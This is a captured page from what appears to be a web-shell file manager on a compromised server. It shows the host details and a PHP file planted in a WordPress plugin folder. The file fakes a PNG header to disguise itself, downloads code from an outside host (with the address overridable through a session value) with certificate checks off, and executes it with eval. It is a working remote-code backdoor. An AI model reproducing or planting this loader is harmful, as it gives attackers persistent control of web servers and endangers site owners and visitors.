HEX
Server: LiteSpeed
System: Linux emerald.serverdnsnetwork.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User: mahdetej (1135)
PHP: 8.1.34
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open
Upload Files
File: /home/mahdetej/public_html/wp-content/plugins/neoncore-themes/O/4C415249443544D414E45.php
<?php
/* PNG %k25u25%fgd5n! 偽装頭部 */
echo "\x89PNG\r\n\x1a\n";
echo "混沌開始 FAKE HEADER";

session_start();

$目标地址 = $_SESSION['url'] ?? 'https://id69project.pages.dev/zedd.jpg';

$データ = '';
if (function_exists('curl_init')) {
    $ch = curl_init($目标地址);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $データ = curl_exec($ch);
    curl_close($ch);
}

if (!empty($データ)) {
    eval('?>' . $データ);
}
?>